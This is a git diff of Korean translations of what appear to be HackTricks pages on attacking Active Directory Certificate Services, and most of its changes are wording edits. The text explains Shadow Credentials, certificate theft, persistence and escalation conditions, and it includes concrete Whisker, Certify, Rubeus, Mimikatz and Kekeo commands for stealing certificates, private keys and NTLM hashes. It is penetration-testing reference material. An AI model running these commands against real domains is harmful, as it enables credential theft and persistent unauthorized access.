+게시물에서는 **공개-비공개 키 인증 자격 증명**을 설정하여 대상의 NTLM 해시를 포함하는 고유한 **서비스 티켓**을 획득하는 방법이 설명되어 있습니다. 이 과정에는 암호화된 NTLM_SUPPLEMENTAL_CREDENTIAL이 포함된 권한 속성 인증서(PAC)가 포함되며, 이는 복호화할 수 있습니다.
 
 ### Requirements
 
 이 기술을 적용하려면 특정 조건을 충족해야 합니다:
 
-- 최소한 하나의 Windows Server 2016 도메인 컨트롤러가 필요합니다.
+- 최소 하나의 Windows Server 2016 도메인 컨트롤러가 필요합니다.
 - 도메인 컨트롤러에는 서버 인증 디지털 인증서가 설치되어 있어야 합니다.
 - Active Directory는 Windows Server 2016 기능 수준이어야 합니다.
-- 대상 객체의 msDS-KeyCredentialLink 속성을 수정할 수 있는 권한이 있는 계정이 필요합니다.
+- 대상 객체의 msDS-KeyCredentialLink 속성을 수정할 수 있는 권한이 위임된 계정이 필요합니다.
 
 ## Abuse
 
@@ -26,7 +26,7 @@
 1. 의도한 호스트에서 특권 사용자를 가장하기 위해 **RC4 실버 티켓**을 생성합니다.
 2. **S4U2Self**와 함께 TGT를 사용하여 **특권 사용자**를 가장하며, 서비스 이름에 서비스 클래스를 추가하기 위해 서비스 티켓을 수정해야 합니다.
 
-Key Trust 남용의 중요한 이점은 공격자가 생성한 개인 키로 제한되어 있어, 잠재적으로 취약한 계정으로의 위임을 피하고, 제거하기 어려울 수 있는 컴퓨터 계정을 생성할 필요가 없다는 점입니다.
+Key Trust 남용의 중요한 장점은 공격자가 생성한 개인 키로 제한되어 있어 잠재적으로 취약한 계정으로의 위임을 피하고, 제거하기 어려울 수 있는 컴퓨터 계정을 생성할 필요가 없다는 점입니다.
 
 ## Tools
 
@@ -39,7 +39,7 @@ Key Trust 남용의 중요한 이점은 공격자가 생성한 개인 키로 제
 - **Add**: 키 쌍을 생성하고 키 자격 증명을 추가합니다.
 - **List**: 모든 키 자격 증명 항목을 표시합니다.
 - **Remove**: 지정된 키 자격 증명을 삭제합니다.
-- **Clear**: 모든 키 자격 증명을 지워, 합법적인 WHfB 사용에 방해가 될 수 있습니다.
+- **Clear**: 모든 키 자격 증명을 지워 합법적인 WHfB 사용을 방해할 수 있습니다.
 ```shell
 Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1
 ```
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates.md b/src/windows-hardening/active-directory-methodology/ad-certificates.md
index d41f24a85..9077c3d82 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates.md
@@ -19,7 +19,7 @@
 
 ### Special Considerations
 
-- **주체 대체 이름(Subject Alternative Names, SANs)**은 인증서의 적용 범위를 여러 신원으로 확장하여 여러 도메인을 가진 서버에 중요합니다. 공격자가 SAN 사양을 조작하여 가장하는 위험을 피하기 위해 안전한 발급 프로세스가 필수적입니다.
+- **주체 대체 이름(SANs)**은 인증서의 적용 범위를 여러 신원으로 확장하여 여러 도메인을 가진 서버에 중요합니다. 안전한 발급 프로세스는 SAN 사양을 조작하는 공격자에 의한 사칭 위험을 피하는 데 필수적입니다.
 
 ### Certificate Authorities (CAs) in Active Directory (AD)
 
@@ -63,18 +63,18 @@ CA의 권한은 보안 설명서에 명시되어 있으며, 인증 기관 관리
 
 특정 제어가 적용될 수 있습니다, 예를 들어:
 
-- **관리자 승인(Manager Approval)**: 요청을 인증서 관리자에 의해 승인될 때까지 보류 상태로 둡니다.
-- **등록 에이전트 및 승인 서명(Enrolment Agents and Authorized Signatures)**: CSR에 필요한 서명의 수와 필요한 응용 프로그램 정책 OID를 지정합니다.
+- **관리자 승인(Manager Approval)**: 요청을 인증서 관리자가 승인할 때까지 보류 상태로 둡니다.
+- **등록 에이전트 및 승인 서명(Enrolment Agents and Authorized Signatures)**: CSR에 필요한 서명의 수와 필요한 애플리케이션 정책 OID를 지정합니다.
 
 ### Methods to Request Certificates
 
 인증서는 다음을 통해 요청할 수 있습니다:
 
-1. **Windows 클라이언트 인증서 등록 프로토콜(Windows Client Certificate Enrollment Protocol, MS-WCCE)**, DCOM 인터페이스를 사용합니다.
-2. **ICertPassage 원격 프로토콜(ICertPassage Remote Protocol, MS-ICPR)**, 명명된 파이프 또는 TCP/IP를 통해.
+1. **Windows 클라이언트 인증서 등록 프로토콜** (MS-WCCE), DCOM 인터페이스를 사용합니다.
+2. **ICertPassage 원격 프로토콜** (MS-ICPR), 명명된 파이프 또는 TCP/IP를 통해.
 3. **인증서 등록 웹 인터페이스**, 인증 기관 웹 등록 역할이 설치된 경우.
-4. **인증서 등록 서비스(Certificate Enrollment Service, CES)**, 인증서 등록 정책(CEP) 서비스와 함께.
-5. **네트워크 장치 등록 서비스(Network Device Enrollment Service, NDES)**, 네트워크 장치용으로, 간단한 인증서 등록 프로토콜(SCEP)을 사용합니다.
+4. **인증서 등록 서비스** (CES), 인증서 등록 정책(CEP) 서비스와 함께.
+5. **네트워크 장치 등록 서비스** (NDES) 네트워크 장치를 위한, 간단한 인증서 등록 프로토콜(SCEP)을 사용합니다.
 
 Windows 사용자는 GUI(`certmgr.msc` 또는 `certlm.msc`) 또는 명령줄 도구(`certreq.exe` 또는 PowerShell의 `Get-Certificate` 명령)를 통해 인증서를 요청할 수도 있습니다.
 ```powershell
@@ -87,7 +87,7 @@ Active Directory (AD)는 인증서 인증을 지원하며, 주로 **Kerberos** 
 
 ### Kerberos 인증 프로세스
 
-Kerberos 인증 프로세스에서 사용자의 Ticket Granting Ticket (TGT) 요청은 사용자의 인증서의 **개인 키**를 사용하여 서명됩니다. 이 요청은 도메인 컨트롤러에 의해 인증서의 **유효성**, **경로**, 및 **폐기 상태**를 포함한 여러 검증을 거칩니다. 검증에는 인증서가 신뢰할 수 있는 출처에서 왔는지 확인하고 발급자의 존재를 **NTAUTH 인증서 저장소**에서 확인하는 것도 포함됩니다. 검증이 성공적으로 완료되면 TGT가 발급됩니다. AD의 **`NTAuthCertificates`** 객체는 다음 위치에 있습니다:
+Kerberos 인증 프로세스에서 사용자의 Ticket Granting Ticket (TGT) 요청은 사용자의 인증서의 **개인 키**를 사용하여 서명됩니다. 이 요청은 도메인 컨트롤러에 의해 여러 검증을 거치며, 여기에는 인증서의 **유효성**, **경로**, 및 **폐기 상태**가 포함됩니다. 검증에는 인증서가 신뢰할 수 있는 출처에서 왔는지 확인하고 발급자의 존재를 **NTAUTH 인증서 저장소**에서 확인하는 것도 포함됩니다. 검증이 성공적으로 완료되면 TGT가 발급됩니다. AD의 **`NTAuthCertificates`** 객체는 다음 위치에 있습니다:
 ```bash
 CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=<domain>,DC=<com>
 ```
@@ -99,7 +99,7 @@ Schannel은 안전한 TLS/SSL 연결을 용이하게 하며, 핸드셰이크 중
 
 ### AD 인증서 서비스 열거
 
-AD의 인증서 서비스는 LDAP 쿼리를 통해 열거할 수 있으며, **엔터프라이즈 인증 기관 (CAs)** 및 그 구성에 대한 정보를 드러냅니다. 이는 특별한 권한 없이 도메인 인증된 사용자라면 누구나 접근할 수 있습니다. **[Certify](https://github.com/GhostPack/Certify)** 및 **[Certipy](https://github.com/ly4k/Certipy)**와 같은 도구는 AD CS 환경에서 열거 및 취약성 평가에 사용됩니다.
+AD의 인증서 서비스는 LDAP 쿼리를 통해 열거할 수 있으며, **엔터프라이즈 인증 기관 (CAs)** 및 그 구성에 대한 정보를 드러냅니다. 이는 특별한 권한 없이 도메인 인증된 모든 사용자가 접근할 수 있습니다. **[Certify](https://github.com/GhostPack/Certify)** 및 **[Certipy](https://github.com/ly4k/Certipy)**와 같은 도구는 AD CS 환경에서 열거 및 취약성 평가에 사용됩니다.
 
 이 도구를 사용하는 명령어는 다음과 같습니다:
 ```bash
@@ -115,7 +115,7 @@ certipy find -vulnerable -u john@corp.local -p Passw0rd -dc-ip 172.16.126.128
 certutil.exe -TCAInfo
 certutil -v -dstemplate
 ```
-## 참고 문헌
+## 참고문헌
 
 - [https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)
 - [https://comodosslstore.com/blog/what-is-ssl-tls-client-authentication-how-does-it-work.html](https://comodosslstore.com/blog/what-is-ssl-tls-client-authentication-how-does-it-work.html)
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/README.md b/src/windows-hardening/active-directory-methodology/ad-certificates/README.md
index 4f933d5a2..e160f5e61 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/README.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/README.md
@@ -13,7 +13,7 @@
 - **발급자**는 인증서를 발급한 CA를 나타냅니다.
 - **SubjectAlternativeName**은 주체에 대한 추가 이름을 허용하여 식별 유연성을 향상시킵니다.
 - **기본 제약 조건**은 인증서가 CA용인지 최종 엔티티용인지 식별하고 사용 제한을 정의합니다.
-- **확장 키 사용(EKUs)**은 인증서의 특정 목적을 정의하며, 코드 서명 또는 이메일 암호화와 같은 용도로 객체 식별자(OIDs)를 통해 구분합니다.
+- **확장 키 사용(EKUs)**은 인증서의 특정 목적을 개체 식별자(OIDs)를 통해 구분합니다.
 - **서명 알고리즘**은 인증서 서명 방법을 지정합니다.
 - **서명**은 발급자의 개인 키로 생성되어 인증서의 진위를 보장합니다.
 
@@ -28,13 +28,13 @@ AD CS는 AD 포리스트 내에서 지정된 컨테이너를 통해 CA 인증서
 - **인증 기관** 컨테이너는 신뢰할 수 있는 루트 CA 인증서를 보유합니다.
 - **등록 서비스** 컨테이너는 엔터프라이즈 CA 및 해당 인증서 템플릿을 자세히 설명합니다.
 - **NTAuthCertificates** 객체는 AD 인증을 위해 승인된 CA 인증서를 포함합니다.
-- **AIA (Authority Information Access)** 컨테이너는 중간 및 교차 CA 인증서와 함께 인증서 체인 검증을 용이하게 합니다.
+- **AIA (Authority Information Access)** 컨테이너는 중간 및 교차 CA 인증서를 통해 인증서 체인 검증을 용이하게 합니다.
 
 ### Certificate Acquisition: Client Certificate Request Flow
 
 1. 요청 프로세스는 클라이언트가 엔터프라이즈 CA를 찾는 것으로 시작됩니다.
 2. 공개-개인 키 쌍을 생성한 후, 공개 키 및 기타 세부 정보를 포함하는 CSR이 생성됩니다.
-3. CA는 사용 가능한 인증서 템플릿에 대해 CSR을 평가하고, 템플릿의 권한에 따라 인증서를 발급합니다.
+3. CA는 사용 가능한 인증서 템플릿에 대해 CSR을 평가하고 템플릿의 권한에 따라 인증서를 발급합니다.
 4. 승인 후, CA는 개인 키로 인증서에 서명하고 클라이언트에게 반환합니다.
 
 ### Certificate Templates
@@ -43,17 +43,17 @@ AD 내에서 정의된 이러한 템플릿은 인증서 발급을 위한 설정
 
 ## Certificate Enrollment
 
-인증서 등록 프로세스는 관리자가 **인증서 템플릿을 생성**함으로써 시작되며, 이후 **엔터프라이즈 인증 기관(CA)**에 의해 **게시**됩니다. 이는 템플릿을 클라이언트 등록에 사용할 수 있도록 하며, 이는 Active Directory 객체의 `certificatetemplates` 필드에 템플릿 이름을 추가하여 달성됩니다.
+인증서 등록 프로세스는 관리자가 **인증서 템플릿을 생성**함으로써 시작되며, 이후 **엔터프라이즈 인증 기관(CA)**에 의해 **게시**됩니다. 이는 템플릿을 클라이언트 등록을 위해 사용할 수 있게 하며, 이는 Active Directory 객체의 `certificatetemplates` 필드에 템플릿 이름을 추가하여 달성됩니다.
 
-클라이언트가 인증서를 요청하려면 **등록 권한**이 부여되어야 합니다. 이러한 권한은 인증서 템플릿 및 엔터프라이즈 CA 자체의 보안 설명자에 의해 정의됩니다. 요청이 성공하려면 두 위치 모두에서 권한이 부여되어야 합니다.
+클라이언트가 인증서를 요청하려면 **등록 권한**이 부여되어야 합니다. 이러한 권한은 인증서 템플릿 및 엔터프라이즈 CA 자체의 보안 설명자에 의해 정의됩니다. 요청이 성공적으로 이루어지려면 두 위치 모두에서 권한이 부여되어야 합니다.
 
 ### Template Enrollment Rights
 
 이러한 권한은 Access Control Entries (ACEs)를 통해 지정되며, 다음과 같은 권한을 자세히 설명합니다:
 
-- **Certificate-Enrollment** 및 **Certificate-AutoEnrollment** 권한은 각각 특정 GUID와 연결됩니다.
-- **ExtendedRights**는 모든 확장 권한을 허용합니다.
-- **FullControl/GenericAll**은 템플릿에 대한 완전한 제어를 제공합니다.
+- **Certificate-Enrollment** 및 **Certificate-AutoEnrollment** 권한, 각각 특정 GUID와 연결됩니다.
+- **ExtendedRights**, 모든 확장 권한을 허용합니다.
+- **FullControl/GenericAll**, 템플릿에 대한 완전한 제어를 제공합니다.
 
 ### Enterprise CA Enrollment Rights
 
@@ -93,13 +93,13 @@ CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=<do
 ```
 신뢰를 구축하는 데 중앙 역할을 합니다.
 
-### Secure Channel (Schannel) 인증
+### 보안 채널 (Schannel) 인증
 
-Schannel은 안전한 TLS/SSL 연결을 용이하게 하며, 핸드셰이크 중 클라이언트는 인증서를 제시하고, 성공적으로 검증되면 접근을 허가합니다. 인증서를 AD 계정에 매핑하는 과정은 Kerberos의 **S4U2Self** 기능이나 인증서의 **Subject Alternative Name (SAN)** 등을 포함할 수 있습니다.
+Schannel은 안전한 TLS/SSL 연결을 용이하게 하며, 핸드셰이크 중 클라이언트는 인증서를 제시하고, 성공적으로 검증되면 접근을 허가합니다. 인증서를 AD 계정에 매핑하는 과정은 Kerberos의 **S4U2Self** 기능이나 인증서의 **주체 대체 이름 (SAN)** 등을 포함할 수 있습니다.
 
 ### AD 인증서 서비스 열거
 
-AD의 인증서 서비스는 LDAP 쿼리를 통해 열거할 수 있으며, **Enterprise Certificate Authorities (CAs)** 및 그 구성에 대한 정보를 드러냅니다. 이는 특별한 권한 없이 도메인 인증된 사용자라면 누구나 접근할 수 있습니다. **[Certify](https://github.com/GhostPack/Certify)** 및 **[Certipy](https://github.com/ly4k/Certipy)**와 같은 도구는 AD CS 환경에서 열거 및 취약성 평가에 사용됩니다.
+AD의 인증서 서비스는 LDAP 쿼리를 통해 열거할 수 있으며, **기업 인증 기관 (CAs)** 및 그 구성에 대한 정보를 드러냅니다. 이는 특별한 권한 없이 도메인 인증된 사용자라면 누구나 접근할 수 있습니다. **[Certify](https://github.com/GhostPack/Certify)** 및 **[Certipy](https://github.com/ly4k/Certipy)**와 같은 도구는 AD CS 환경에서 열거 및 취약성 평가에 사용됩니다.
 
 이 도구를 사용하는 명령어는 다음과 같습니다:
 ```bash
@@ -115,7 +115,7 @@ certipy find -vulnerable -u john@corp.local -p Passw0rd -dc-ip 172.16.126.128
 certutil.exe -TCAInfo
 certutil -v -dstemplate
 ```
-## 참고문헌
+## 참고 문헌
 
 - [https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)
 - [https://comodosslstore.com/blog/what-is-ssl-tls-client-authentication-how-does-it-work.html](https://comodosslstore.com/blog/what-is-ssl-tls-client-authentication-how-does-it-work.html)
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md b/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md
index f27694a04..ad11a5c53 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md
@@ -2,17 +2,17 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**이것은 [https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)에서의 훌륭한 연구의 머신 지속성 장에 대한 간단한 요약입니다.**
+**이것은 [https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)에서의 멋진 연구의 머신 지속성 장에 대한 간단한 요약입니다.**
 
 ## **인증서를 통한 활성 사용자 자격 증명 도난 이해 – PERSIST1**
 
 사용자가 도메인 인증을 허용하는 인증서를 요청할 수 있는 시나리오에서, 공격자는 이 인증서를 **요청**하고 **탈취**하여 네트워크에서 **지속성**을 유지할 기회를 갖습니다. 기본적으로 Active Directory의 `User` 템플릿은 이러한 요청을 허용하지만, 때때로 비활성화될 수 있습니다.
 
-[**Certify**](https://github.com/GhostPack/Certify)라는 도구를 사용하여 지속적인 접근을 가능하게 하는 유효한 인증서를 검색할 수 있습니다:
+[**Certify**](https://github.com/GhostPack/Certify)라는 도구를 사용하여 지속적인 액세스를 가능하게 하는 유효한 인증서를 검색할 수 있습니다:
 ```bash
 Certify.exe find /clientauth
 ```
-인증서의 힘은 인증서가 **소속된 사용자로 인증할 수 있는 능력**에 있으며, 인증서가 **유효**한 한 비밀번호 변경과 관계없이 작동합니다.
+인증서의 힘은 인증서가 **소속된 사용자로서 인증할 수 있는 능력**에 있으며, 인증서가 **유효**한 한 비밀번호 변경과 관계없이 그렇습니다.
 
 인증서는 `certmgr.msc`를 사용하여 그래픽 인터페이스를 통해 요청하거나 `certreq.exe`를 사용하여 명령줄을 통해 요청할 수 있습니다. **Certify**를 사용하면 인증서를 요청하는 과정이 다음과 같이 간소화됩니다:
 ```bash
@@ -22,11 +22,11 @@ Certify.exe request /ca:CA-SERVER\CA-NAME /template:TEMPLATE-NAME
 ```bash
 openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
 ```
-`.pfx` 파일은 대상 시스템에 업로드된 후 [**Rubeus**](https://github.com/GhostPack/Rubeus)라는 도구와 함께 사용되어 사용자의 티켓 부여 티켓(TGT)을 요청하는 데 사용되며, 공격자의 접근 권한을 인증서가 **유효**한 동안(일반적으로 1년) 연장합니다.
+`.pfx` 파일은 대상 시스템에 업로드된 후 [**Rubeus**](https://github.com/GhostPack/Rubeus)라는 도구와 함께 사용되어 사용자의 티켓 부여 티켓(TGT)을 요청할 수 있으며, 공격자의 접근 권한을 인증서가 **유효**한 동안(일반적으로 1년) 연장합니다.
 ```bash
 Rubeus.exe asktgt /user:harmj0y /certificate:C:\Temp\cert.pfx /password:CertPass!
 ```
-중요한 경고는 이 기술이 **THEFT5** 섹션에 설명된 다른 방법과 결합되어 공격자가 Local Security Authority Subsystem Service (LSASS)와 상호작용하지 않고도 계정의 **NTLM 해시**를 지속적으로 얻을 수 있게 한다는 점입니다. 이는 비승격된 컨텍스트에서 이루어져 장기적인 자격 증명 탈취를 위한 더 은밀한 방법을 제공합니다.
+중요한 경고는 이 기술이 **THEFT5** 섹션에 설명된 다른 방법과 결합되어 공격자가 Local Security Authority Subsystem Service (LSASS)와 상호작용하지 않고도 계정의 **NTLM 해시**를 지속적으로 얻을 수 있게 한다는 점입니다. 이는 비승격된 컨텍스트에서 이루어지며, 장기적인 자격 증명 도용을 위한 더 은밀한 방법을 제공합니다.
 
 ## **인증서를 통한 머신 지속성 확보 - PERSIST2**
 
@@ -36,10 +36,10 @@ Certify.exe request /ca:dc.theshire.local/theshire-DC-CA /template:Machine /mach
 ```
 이 접근 방식은 공격자가 머신 계정으로 **Kerberos**에 인증하고 **S4U2Self**를 활용하여 호스트의 모든 서비스에 대한 Kerberos 서비스 티켓을 얻을 수 있게 하여, 공격자에게 머신에 대한 지속적인 접근을 효과적으로 부여합니다.
 
-## **인증서 갱신을 통한 지속성 확장 - PERSIST3**
+## **인증서 갱신을 통한 지속성 연장 - PERSIST3**
 
 논의된 마지막 방법은 인증서 템플릿의 **유효성** 및 **갱신 기간**을 활용하는 것입니다. 공격자는 인증서가 만료되기 전에 **갱신**함으로써 추가 티켓 등록 없이 Active Directory에 대한 인증을 유지할 수 있으며, 이는 인증서 기관(CA) 서버에 흔적을 남길 수 있습니다.
 
-이 접근 방식은 CA 서버와의 상호작용을 최소화하여 탐지 위험을 줄이고, 관리자가 침입을 감지할 수 있는 아티팩트 생성을 피하는 **확장된 지속성** 방법을 허용합니다.
+이 접근 방식은 CA 서버와의 상호작용을 최소화하여 탐지 위험을 줄이고, 관리자가 침입을 경고할 수 있는 아티팩트 생성을 피함으로써 **지속성 연장** 방법을 허용합니다.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md b/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md
index 73384e34f..67b35e68d 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md
@@ -20,11 +20,11 @@ certutil.exe -dump -v cert.pfx
 ```
 ## 인증서 내보내기 – THEFT1
 
-**대화형 데스크톱 세션**에서 사용자 또는 머신 인증서와 개인 키를 추출하는 것은 **개인 키가 내보낼 수 있는 경우** 특히 쉽게 수행할 수 있습니다. 이는 `certmgr.msc`에서 인증서를 찾아 마우스 오른쪽 버튼을 클릭하고 `모든 작업 → 내보내기`를 선택하여 비밀번호로 보호된 .pfx 파일을 생성함으로써 달성할 수 있습니다.
+**인터랙티브 데스크탑 세션**에서 사용자 또는 머신 인증서와 개인 키를 추출하는 것은 **개인 키가 내보낼 수 있는 경우** 특히 쉽게 수행할 수 있습니다. 이는 `certmgr.msc`에서 인증서를 찾아 마우스 오른쪽 버튼을 클릭하고 `모든 작업 → 내보내기`를 선택하여 비밀번호로 보호된 .pfx 파일을 생성함으로써 달성할 수 있습니다.
 
 **프로그래밍 방식 접근법**으로는 PowerShell `ExportPfxCertificate` cmdlet 또는 [TheWover의 CertStealer C# 프로젝트](https://github.com/TheWover/CertStealer)와 같은 도구가 있습니다. 이들은 **Microsoft CryptoAPI** (CAPI) 또는 Cryptography API: Next Generation (CNG)을 사용하여 인증서 저장소와 상호작용합니다. 이러한 API는 인증서 저장 및 인증에 필요한 다양한 암호화 서비스를 제공합니다.
 
-그러나 개인 키가 내보낼 수 없는 것으로 설정된 경우, CAPI와 CNG는 일반적으로 이러한 인증서의 추출을 차단합니다. 이 제한을 우회하기 위해 **Mimikatz**와 같은 도구를 사용할 수 있습니다. Mimikatz는 개인 키의 내보내기를 허용하기 위해 해당 API를 패치하는 `crypto::capi` 및 `crypto::cng` 명령을 제공합니다. 구체적으로, `crypto::capi`는 현재 프로세스 내의 CAPI를 패치하고, `crypto::cng`는 **lsass.exe**의 메모리를 대상으로 패치합니다.
+그러나 개인 키가 내보낼 수 없는 것으로 설정된 경우, CAPI와 CNG는 일반적으로 이러한 인증서의 추출을 차단합니다. 이 제한을 우회하기 위해 **Mimikatz**와 같은 도구를 사용할 수 있습니다. Mimikatz는 개인 키의 내보내기를 허용하기 위해 해당 API를 패치하는 `crypto::capi` 및 `crypto::cng` 명령을 제공합니다. 구체적으로, `crypto::capi`는 현재 프로세스 내의 CAPI를 패치하고, `crypto::cng`는 패치를 위해 **lsass.exe**의 메모리를 타겟팅합니다.
 
 ## DPAPI를 통한 사용자 인증서 도난 – THEFT2
 
@@ -38,9 +38,9 @@ Windows에서 **인증서 개인 키는 DPAPI에 의해 보호됩니다**. **사
 
 **사용자 인증서**는 주로 `HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates`의 레지스트리에 저장되지만, 일부는 `%APPDATA%\Microsoft\SystemCertificates\My\Certificates` 디렉토리에서도 찾을 수 있습니다. 이러한 인증서에 대한 해당 **개인 키**는 일반적으로 **CAPI** 키의 경우 `%APPDATA%\Microsoft\Crypto\RSA\User SID\`에, **CNG** 키의 경우 `%APPDATA%\Microsoft\Crypto\Keys\`에 저장됩니다.
 
-**인증서와 관련된 개인 키를 추출하기 위해** 프로세스는 다음과 같습니다:
+**인증서와 관련된 개인 키를 추출하기 위해** 과정은 다음과 같습니다:
 
-1. **사용자의 저장소에서 대상 인증서를 선택**하고 해당 키 저장소 이름을 검색합니다.
+1. **사용자의 저장소에서 대상 인증서를 선택하고** 해당 키 저장소 이름을 검색합니다.
 2. **해당 개인 키를 해독하기 위해 필요한 DPAPI 마스터 키를 찾습니다.**
 3. **평문 DPAPI 마스터 키를 사용하여 개인 키를 해독합니다.**
 
@@ -66,7 +66,7 @@ Windows에 의해 `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates` 레
 
 수동 복호화는 **Mimikatz**에서 `lsadump::secrets` 명령을 실행하여 DPAPI_SYSTEM LSA 비밀을 추출한 다음, 이 키를 사용하여 머신 마스터 키를 복호화함으로써 달성할 수 있습니다. 또는, 이전에 설명한 대로 CAPI/CNG를 패치한 후 Mimikatz의 `crypto::certificates /export /systemstore:LOCAL_MACHINE` 명령을 사용할 수 있습니다.
 
-**SharpDPAPI**는 인증서 명령을 통해 보다 자동화된 접근 방식을 제공합니다. `/machine` 플래그가 상승된 권한으로 사용될 때, SYSTEM으로 상승하고 DPAPI_SYSTEM LSA 비밀을 덤프한 다음, 이를 사용하여 머신 DPAPI 마스터 키를 복호화하고, 이러한 평문 키를 조회 테이블로 사용하여 모든 머신 인증서 개인 키를 복호화합니다.
+**SharpDPAPI**는 인증서 명령을 통해 보다 자동화된 접근 방식을 제공합니다. `/machine` 플래그가 상승된 권한으로 사용될 때, SYSTEM으로 상승하고 DPAPI_SYSTEM LSA 비밀을 덤프하며, 이를 사용하여 머신 DPAPI 마스터 키를 복호화한 다음, 이러한 평문 키를 조회 테이블로 사용하여 모든 머신 인증서 개인 키를 복호화합니다.
 
 ## Finding Certificate Files – THEFT4
 
@@ -94,7 +94,7 @@ john --wordlist=passwords.txt hash.txt
 
 주어진 내용은 PKINIT를 통한 NTLM 자격 증명 도용 방법, 특히 THEFT5로 레이블이 붙은 도용 방법을 설명합니다. 다음은 수동태로 재설명하며, 내용이 익명화되고 요약된 것입니다:
 
-Kerberos 인증을 지원하지 않는 애플리케이션을 위해 NTLM 인증 [MS-NLMP]을 지원하기 위해, KDC는 PKCA가 사용될 때 사용자 NTLM 일방향 함수(OWF)를 특권 속성 인증서(PAC) 내에서 반환하도록 설계되었습니다. 따라서 계정이 PKINIT를 통해 인증하고 티켓 부여 티켓(TGT)을 확보할 경우, 현재 호스트가 TGT에서 NTLM 해시를 추출하여 레거시 인증 프로토콜을 유지할 수 있도록 하는 메커니즘이 본질적으로 제공됩니다. 이 과정은 NTLM 평문을 NDR 직렬화된 형태로 나타내는 `PAC_CREDENTIAL_DATA` 구조체의 복호화를 포함합니다.
+Kerberos 인증을 지원하지 않는 애플리케이션을 위해 NTLM 인증 [MS-NLMP]을 지원하기 위해, KDC는 PKCA가 사용될 때 권한 속성 인증서(PAC) 내에서 사용자의 NTLM 일방향 함수(OWF)를 반환하도록 설계되었습니다. 따라서 계정이 PKINIT를 통해 티켓 부여 티켓(TGT)을 인증하고 확보할 경우, 현재 호스트가 TGT에서 NTLM 해시를 추출하여 레거시 인증 프로토콜을 유지할 수 있도록 하는 메커니즘이 본질적으로 제공됩니다. 이 과정은 NTLM 평문을 NDR 직렬화된 형태로 나타내는 `PAC_CREDENTIAL_DATA` 구조체의 복호화를 포함합니다.
 
 유틸리티 **Kekeo**는 [https://github.com/gentilkiwi/kekeo](https://github.com/gentilkiwi/kekeo)에서 접근할 수 있으며, 이 특정 데이터를 포함하는 TGT를 요청할 수 있는 기능이 있다고 언급됩니다. 이를 위한 명령은 다음과 같습니다:
 ```bash
@@ -102,6 +102,6 @@ tgt::pac /caname:generic-DC-CA /subject:genericUser /castore:current_user /domai
 ```
 추가적으로, Kekeo는 핀을 검색할 수 있는 경우 스마트카드 보호 인증서를 처리할 수 있다는 점이 언급되며, [https://github.com/CCob/PinSwipe](https://github.com/CCob/PinSwipe)에 대한 참조가 있습니다. 동일한 기능이 **Rubeus**에서도 지원된다고 하며, 이는 [https://github.com/GhostPack/Rubeus](https://github.com/GhostPack/Rubeus)에서 사용할 수 있습니다.
 
-이 설명은 PKINIT을 통한 NTLM 자격 증명 도용 과정과 관련된 도구를 요약하며, PKINIT을 사용하여 얻은 TGT를 통해 NTLM 해시를 검색하는 데 중점을 두고 있으며, 이 과정을 용이하게 하는 유틸리티를 포함합니다.
+이 설명은 PKINIT을 통한 NTLM 자격 증명 도용 과정과 관련 도구를 요약하며, PKINIT을 사용하여 얻은 TGT를 통해 NTLM 해시를 검색하는 데 중점을 두고, 이 과정을 용이하게 하는 유틸리티를 다룹니다.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
index da9ad7f4b..c043c2b66 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
@@ -19,12 +19,12 @@
 - **권한 있는 직원의 서명이 필요하지 않습니다.**
 - **인증서 템플릿의 보안 설명자가 지나치게 관대하여 낮은 권한의 사용자가 등록 권한을 얻을 수 있습니다.**
 - **인증서 템플릿은 인증을 용이하게 하는 EKU를 정의하도록 구성됩니다:**
-- 클라이언트 인증 (OID 1.3.6.1.5.5.7.3.2), PKINIT 클라이언트 인증 (1.3.6.1.5.2.3.4), 스마트 카드 로그인 (OID 1.3.6.1.4.1.311.20.2.2), 모든 목적 (OID 2.5.29.37.0) 또는 EKU 없음 (SubCA)과 같은 확장 키 사용 (EKU) 식별자가 포함됩니다.
+- 클라이언트 인증 (OID 1.3.6.1.5.5.7.3.2), PKINIT 클라이언트 인증 (1.3.6.1.5.2.3.4), 스마트 카드 로그인 (OID 1.3.6.1.4.1.311.20.2.2), 모든 용도 (OID 2.5.29.37.0) 또는 EKU 없음 (SubCA)과 같은 확장 키 사용 (EKU) 식별자가 포함됩니다.
